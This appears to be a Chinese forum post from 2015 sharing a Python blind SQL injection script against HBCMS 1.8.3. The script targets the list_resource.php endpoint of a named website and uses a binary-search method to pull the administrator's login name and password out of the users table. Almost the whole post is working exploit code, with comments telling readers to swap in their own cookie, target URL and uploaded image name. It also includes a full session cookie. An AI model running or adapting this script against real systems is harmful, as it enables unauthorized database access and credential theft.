python 盲注 HBCMS 1.8.3 漏洞
本帖最后由 ran 于 2015-1-31 12:01 编辑根据文章所写,应该是需要cookie。做好准备工作,上传个图片。
代码采用二分法,类似于sqlmap的算法
#-*- coding: UTF-8 -*-
__author__ = 'Administrator'
import requests
def post_data(step,p,min,max):
if step == 1:
sql_code = "(select length(login_name) from hbcms_users where id=1)>"+str(p)
if step == 2:
sql_code = "(select length(login_pass) from hbcms_users where id=1)>"+str(p)
if step == 3:
sql_code = "(select mid(login_name,"+str(p)+",1) from hbcms_users where id=1) between char("+str(min)+") and char("+str(max)+")"
if step == 4:
sql_code = "(select mid(login_pass,"+str(p)+",1) from hbcms_users where id=1) between char("+str(min)+") and char("+str(max)+")"
return sql_code
header = {#Cookie需要自己修改
"Cookie":"visited_page=5629-; bdshare_firstime=1422370057395; PHPSESSION=ep7nhkn8poei9jbckd68j2arr1; HBcmsLogin=19d2c1427b496606c40cdfa0f7139327dca4962953fb8ea0fda93c3b87635c12lbc555; HBcmsLoginName=lbc555; HBcmsLoginID=1122; Hm_lvt_f9fcde02679434efdea208afff286914=1422370057,1422410160; Hm_lpvt_f9fcde02679434efdea208afff286914=1422410945; AJSTAT_ok_pages=28; AJSTAT_ok_times=1; Hm_lvt_a3afd03fd164ca89566a02f9c9db5dad=1422370057,1422410160; Hm_lpvt_a3afd03fd164ca89566a02f9c9db5dad=1422410945"
}
name_len = 1
pass_len = 32
name_con = ""
pass_con = ""
for step in range(1,5):
if step == 1 or step == 2:
p = 20
min = 0
max = 40
while(1):
#print str(max)+":"+str(min)
if p == 40:
print "Too long! Fuck you!"
break
payload = {
"show_top_part=":"yes",
"pageID":"1",
"category_id":"all",
"file_type":"0",
"title":"q%\" and "+ post_data(step,p,0,0) +" and \"%a%\"=\"%a",
"btnSubmit":"提交"
}
r = requests.post('http://www.hackblog.cn/user/list_resource.php',data=payload,headers=header) #修改目标url
if "1309_1122_150128100612.gif" in r.content: #修改你上传后的图片名
min = p
p = int(round((float(max) - float(min))/2)) + min
if max - min == 1:
if step == 1:
name_len = p
print "username length is "+str(name_len)
break
if step == 2:
pass_len = p
print "password length is "+str(pass_len)
break
else:
max = p
p = int(round((float(max) - float(min))/2)) + min
if max - min == 1:
if step == 1:
name_len = p
print "username length is "+str(name_len)
break
if step == 2:
pass_len = p
print "password length is "+str(pass_len)
break
if step == 3 or step == 4:
if step == 3:
end = name_len
else:
end = pass_len
for k in range(1,end+1):
p = 47
min = 32
max = 126
while(1):
#print str(max)+":"+str(min)+":"+str(p)
payload = {
"show_top_part=":"yes",
"pageID":"1",
"category_id":"all",
"file_type":"0",
"title":"q%\" and "+ post_data(step,k,p,max) +" and \"%a%\"=\"%a",
"btnSubmit":"提交"
}
r = requests.post('http://www.hackblog.cn/user/list_resource.php',data=payload,headers=header)#修改目标url
if "1309_1122_150128100612.gif" in r.content: #修改你上传后的图片名
if max - min == 2:
if step == 3:
name_con = name_con + chr(p)
print "username is "+name_con
else:
pass_con = pass_con + chr(p)
print "password is "+pass_con
break
if max - min == 1:
max = max + 1
min = p
p = int(round((float(max) - float(min))/2)) + min
else:
if max - min == 1:
min = min - 1
max = p
p = int(round((float(max) - float(min))/2)) + min
参考文章:http://tunps.com/hbcms-list_resource-php-blind-sql-injection
转自Hack Blog
页:
[1]